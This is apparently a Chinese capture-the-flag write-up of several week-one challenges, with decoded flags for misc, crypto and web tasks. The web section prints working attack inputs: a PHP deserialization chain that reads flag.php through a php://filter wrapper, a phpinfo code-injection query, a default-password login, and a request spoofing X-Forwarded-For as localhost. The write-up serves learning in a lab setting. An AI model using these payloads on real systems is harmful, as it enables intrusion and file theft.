emmm,做了可能有30题,大部分没记录,然后这些就是记录到了的wp
misc-massage
0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D
放入随波逐流,得到Duckspeak解密
SHCTF{ba978405-b1c8-847c-8e69-f62177e4c087}
crypto-[WEEK1]黑暗之歌
好好好,这一次成功让我意识到了不能过分依赖于cyberchef
4pms4pmpwrbima/imazima3imazimavimavimarimazima/igJbima/imazCp+KZrMKn4pmvwrbigJbCtuKAluKAluKAlsK24oCW4pmt4pmvwrbigJbimazimazima3igJbima/igJbCtuKZq+KZq+KZrz0=
base64解码得到音符
♬♩¶♯♬♭♬♫♫♪♬♯‖♯♬§♬§♯¶‖¶‖‖‖¶‖♭♯¶‖♬♬♭‖♯‖¶♫♫♯=
直接去音符在线解密,得到
flag{b2cc-9091-8a29}
web-[WEEK1]ez_serialize
<?php
class A
{
public $var_1;
}
class B
{
public $q;
}
class C
{
public $var;
public $z;
}
class D
{
public $p;
}
$a = new B();
$b = new C();
$c = new D();
$d = new A();
$a->q = $b;
$b->z = $c;
$c->p = $d;
$d->var_1 = "php://filter/read=convert.base64-encode/resource=flag.php";
echo serialize($a);
payload: /?payload=O:1:"B":1:{s:1:"q";O:1:"C":2:{s:3:"var";N;s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}}
base64解码得到:flag{7b4b9517-b824-4696-9d87-839956ca1a23}
web-[WEEK1]登录就给flag
真登录就给。。。
用户名我们直接输admin,这么简单的题目,又没有什么提示的,那密码就试password喽
flag{6e475611-d8b7-409b-a16f-35947b5bb096}
web-ezphp
/?code={${phpinfo()}}
post:pattern=\S*
flag{13d14cbb-373d-431c-bf18-829ab2183009}
web-生成你的邀请函
POST /generate_invitation HTTP/1.1
Host: 112.6.51.212:32521
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=d33c11ee8dbfed9887197a364a885c6e
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Type: application/json
Content-Length: 122
{
"name": "Yourname",
"imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"
}
然后发送出去,base64解密会得到一张图片,flag就在里面
flag{11fa380b-8f5b-4818-a59a-d3562d92acb7}